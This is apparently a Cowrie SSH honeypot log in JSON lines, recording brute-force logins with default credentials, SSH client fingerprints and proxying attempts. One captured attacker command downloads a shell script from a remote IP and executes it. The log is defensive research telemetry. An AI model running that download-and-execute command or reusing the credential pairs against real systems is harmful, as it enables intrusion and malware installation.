{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T12:20:43.175125Z","src_ip":"213.209.150.239","session":"a83cc0b86d38"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:20:43.457137Z","src_ip":"213.209.150.239","session":"a83cc0b86d38"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":23751,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:23751","sensor":"my-vps","timestamp":"2025-08-26T12:20:43.514544Z","session":"a83cc0b86d38"}
{"eventid":"cowrie.session.closed","duration":17.272913932800293,"message":"Connection lost after 17 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:20:43.522309Z","src_ip":"212.227.235.229","session":"d68ab5eacd22"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T12:20:43.571367Z","src_ip":"213.209.150.239","session":"a83cc0b86d38"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":6043,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:6043","sensor":"my-vps","timestamp":"2025-08-26T12:20:43.727003Z","session":"a83cc0b86d38"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T12:20:43.783640Z","src_ip":"213.209.150.239","session":"a83cc0b86d38"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:20:43.841053Z","src_ip":"213.209.150.239","session":"a83cc0b86d38"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":46134,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f0e7dc04412","protocol":"ssh","message":"New connection: 83.168.105.65:46134 (1.2.3.4:22) [session: 4f0e7dc04412]","sensor":"my-vps","timestamp":"2025-08-26T12:20:48.663647Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:20:48.664808Z","src_ip":"83.168.105.65","session":"4f0e7dc04412"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:20:48.700895Z","src_ip":"83.168.105.65","session":"4f0e7dc04412"}
{"eventid":"cowrie.login.failed","username":"dolphinscheduler","password":"dolphinscheduler","message":"login attempt [dolphinscheduler/dolphinscheduler] failed","sensor":"my-vps","timestamp":"2025-08-26T12:20:48.809329Z","src_ip":"83.168.105.65","session":"4f0e7dc04412"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:20:49.846985Z","src_ip":"83.168.105.65","session":"4f0e7dc04412"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":33694,"dst_ip":"1.2.3.4","dst_port":22,"session":"abfb1172f743","protocol":"ssh","message":"New connection: 83.168.105.65:33694 (1.2.3.4:22) [session: abfb1172f743]","sensor":"my-vps","timestamp":"2025-08-26T12:21:04.148969Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:21:04.149897Z","src_ip":"83.168.105.65","session":"abfb1172f743"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:21:04.188290Z","src_ip":"83.168.105.65","session":"abfb1172f743"}
{"eventid":"cowrie.login.success","username":"root","password":"passwd","message":"login attempt [root/passwd] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:21:04.301679Z","src_ip":"83.168.105.65","session":"abfb1172f743"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:21:04.437237Z","src_ip":"83.168.105.65","session":"abfb1172f743"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T12:21:04.438013Z","src_ip":"83.168.105.65","session":"abfb1172f743"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:21:04.476557Z","src_ip":"83.168.105.65","session":"abfb1172f743"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:21:04.477759Z","src_ip":"83.168.105.65","session":"abfb1172f743"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":50286,"dst_ip":"1.2.3.4","dst_port":22,"session":"4853b0f4b735","protocol":"ssh","message":"New connection: 83.168.105.65:50286 (1.2.3.4:22) [session: 4853b0f4b735]","sensor":"my-vps","timestamp":"2025-08-26T12:21:19.792100Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:21:19.793014Z","src_ip":"83.168.105.65","session":"4853b0f4b735"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:21:19.830158Z","src_ip":"83.168.105.65","session":"4853b0f4b735"}
{"eventid":"cowrie.login.failed","username":"yarn","password":"yarn","message":"login attempt [yarn/yarn] failed","sensor":"my-vps","timestamp":"2025-08-26T12:21:19.944222Z","src_ip":"83.168.105.65","session":"4853b0f4b735"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:21:20.983711Z","src_ip":"83.168.105.65","session":"4853b0f4b735"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":33280,"dst_ip":"1.2.3.4","dst_port":22,"session":"487a9e4d279c","protocol":"ssh","message":"New connection: 83.168.105.65:33280 (1.2.3.4:22) [session: 487a9e4d279c]","sensor":"my-vps","timestamp":"2025-08-26T12:21:35.370514Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:21:35.371206Z","src_ip":"83.168.105.65","session":"487a9e4d279c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:21:35.408257Z","src_ip":"83.168.105.65","session":"487a9e4d279c"}
{"eventid":"cowrie.login.failed","username":"test2","password":"test2","message":"login attempt [test2/test2] failed","sensor":"my-vps","timestamp":"2025-08-26T12:21:35.525739Z","src_ip":"83.168.105.65","session":"487a9e4d279c"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:21:36.565493Z","src_ip":"83.168.105.65","session":"487a9e4d279c"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":43778,"dst_ip":"1.2.3.4","dst_port":22,"session":"46beae9b40e6","protocol":"ssh","message":"New connection: 83.168.105.65:43778 (1.2.3.4:22) [session: 46beae9b40e6]","sensor":"my-vps","timestamp":"2025-08-26T12:21:50.440365Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:21:50.441347Z","src_ip":"83.168.105.65","session":"46beae9b40e6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:21:50.477956Z","src_ip":"83.168.105.65","session":"46beae9b40e6"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle123","message":"login attempt [oracle/oracle123] failed","sensor":"my-vps","timestamp":"2025-08-26T12:21:50.589800Z","src_ip":"83.168.105.65","session":"46beae9b40e6"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:21:51.628333Z","src_ip":"83.168.105.65","session":"46beae9b40e6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43298,"dst_ip":"1.2.3.4","dst_port":22,"session":"c718abc6d54d","protocol":"ssh","message":"New connection: 212.227.125.160:43298 (1.2.3.4:22) [session: c718abc6d54d]","sensor":"my-vps","timestamp":"2025-08-26T12:21:56.945358Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:21:56.946986Z","src_ip":"212.227.125.160","session":"c718abc6d54d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:21:56.992637Z","src_ip":"212.227.125.160","session":"c718abc6d54d"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:21:58.500752Z","src_ip":"212.227.125.160","session":"c718abc6d54d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:21:59.442630Z","src_ip":"212.227.125.160","session":"c718abc6d54d"}
{"eventid":"cowrie.command.input","input":"wget http://23.146.184.21/adb.sh; chmod 777 *; sh adb.sh x86","message":"CMD: wget http://23.146.184.21/adb.sh; chmod 777 *; sh adb.sh x86","sensor":"my-vps","timestamp":"2025-08-26T12:21:59.443430Z","src_ip":"212.227.125.160","session":"c718abc6d54d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/958e74ac463ee3e75e7731e9747ee99a246446506abef9b030bfa21e76109516","size":138,"shasum":"958e74ac463ee3e75e7731e9747ee99a246446506abef9b030bfa21e76109516","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/958e74ac463ee3e75e7731e9747ee99a246446506abef9b030bfa21e76109516 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:21:59.493598Z","src_ip":"212.227.125.160","session":"c718abc6d54d"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:21:59.541186Z","src_ip":"212.227.125.160","session":"c718abc6d54d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45812,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec4fe29628d8","protocol":"ssh","message":"New connection: 212.227.125.160:45812 (1.2.3.4:22) [session: ec4fe29628d8]","sensor":"my-vps","timestamp":"2025-08-26T12:22:04.429186Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:22:04.432029Z","src_ip":"212.227.125.160","session":"ec4fe29628d8"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-26T12:22:04.589649Z","src_ip":"212.227.125.160","session":"ec4fe29628d8"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":48818,"dst_ip":"1.2.3.4","dst_port":22,"session":"b4d7c932eb34","protocol":"ssh","message":"New connection: 83.168.105.65:48818 (1.2.3.4:22) [session: b4d7c932eb34]","sensor":"my-vps","timestamp":"2025-08-26T12:22:05.534444Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:22:05.535370Z","src_ip":"83.168.105.65","session":"b4d7c932eb34"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-ce